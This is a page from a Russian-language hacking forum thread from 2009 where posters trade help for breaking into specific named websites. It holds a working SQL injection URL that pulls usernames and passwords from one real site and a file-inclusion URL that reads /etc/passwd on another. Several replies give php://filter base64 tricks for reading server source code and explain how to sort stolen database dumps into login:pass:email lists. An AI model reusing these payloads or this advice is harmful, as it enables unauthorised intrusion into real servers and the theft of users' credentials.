Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Заюзать скрипт или прогу :) если есстественно разрешен конект из вне...
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    жжёшь, ты читал хоть что-то?


    _http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+aawowinf_mrlink.users
     
    #8642 .:[melkiy]:., 27 Aug 2009
    Last edited: 27 Aug 2009
  3. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Пипец фрукт, ты читать когда пойдешь? БД глянь в которой находится таблица, вероятно, что таблица users не находится в текущей БД... по поводу перевода в хекс промолчу пожалуй...
    Ошибаешься.
     
    #8643 DrAssault, 27 Aug 2009
    Last edited: 27 Aug 2009
    1 person likes this.
  4. Micorubu

    Micorubu New Member

    Joined:
    27 Aug 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Ребят, можно ли что либо с этим сделать или из этого нельзя извлечь выгоду?
    _http://mysql.infobox.ru/server_databases.php
    _http://mysql.infobox.ru/
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.allthat.nm.ru/107.htm

    помимо хss и инклудов че ещё тут актуально?
     
  6. paste

    paste New Member

    Joined:
    9 Aug 2009
    Messages:
    34
    Likes Received:
    3
    Reputations:
    0
    Похоже на рекламу inattack.ru :eek:
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Кроме раскрытия путей и где находится phpMyAdmin, ничего.
     
    #8647 .:[melkiy]:., 28 Aug 2009
    Last edited: 28 Aug 2009
    1 person likes this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    нах мне вашу рекламу,нашлись тут борцы с промоутингом...мне ответ нужен.
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a koqda admin panel na sayte takoy http://www.scaa.us/admin a 4to zdelat??a
     
  10. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    2LokbatanLi искать какуюнить читалку файлов, т.к. пасс почти всегда храниться в файле.

    Вот например есть инклуд
    Code:
    http://www.route66.com.ua/index.php?c=/etc/passwd
    
    когда пытаюсь прочитать какойнить файл с диры сайта например
    Code:
    http://www.route66.com.ua/index.php?c=config.php
    
    то сурсов его невижу, почему он делает так а неиначе и есть ли способ это обойти?
     
    #8650 warlok, 28 Aug 2009
    Last edited: 28 Aug 2009
  11. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Может кто сталкивался- после дампа базы нужно сделать выборку только определенных столбцов и таблиц. Например, нужны
    Code:
    login:pass:email
    или только
    Code:
    login:pass
    Замучился чистить руками от мусора- id и т.п. Что используете для этого?
     
    #8651 Komyak, 28 Aug 2009
    Last edited: 28 Aug 2009
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    регулярные выражения или phpmyadmin+sql-запрос
     
  13. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    До него ещё добраться надо.
    Нет никакого скриптика?
     
  14. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    если контролируется начало значения, которое попадает в include(), то возможно:
    php://filter/read/resource=script.php
     
    1 person likes this.
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    Нет никакого скриптика?
    нет и по идее быть не может универсального, кроме как для хешей и емайлов
     
  16. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    2Komyak
    через шелл сделал запрос к базе сохранил ответ в хтмл а там чиститься очень легко!
     
  17. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    2 Komyak

    Если у тебя есть дамп, то проще всего я думаю сделать выборку на своей машине. Ставь наборчик типа "Денвер" заливай дамп в базу. А потом делай выборку вроде "select concat(login,':',pass,':',email) from userz into outfile 'c:\damp.txt' " все сольется в файл.
     
    1 person likes this.
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    просто там нету этого файла , поэтому он тебе не выдает ни чего

    ЗЫ там вообще RFI (((жаль токо отключена функция allow_url_include
     
    _________________________
    #8658 HAXTA4OK, 28 Aug 2009
    Last edited: 28 Aug 2009
    1 person likes this.
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Там есть файл, но это ИНКЛЮД, а не читалка файлов!
     
    1 person likes this.
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Нифига, так ты файл только выполнишь, а читать надо так:

    Code:
    http://localhost/1.php?a=php://filter/convert.base64-encode/resource=1.php
    
    А потом декодить :)
     
    #8660 Qwazar, 28 Aug 2009
    Last edited: 28 Aug 2009
    11 people like this.
Thread Status:
Not open for further replies.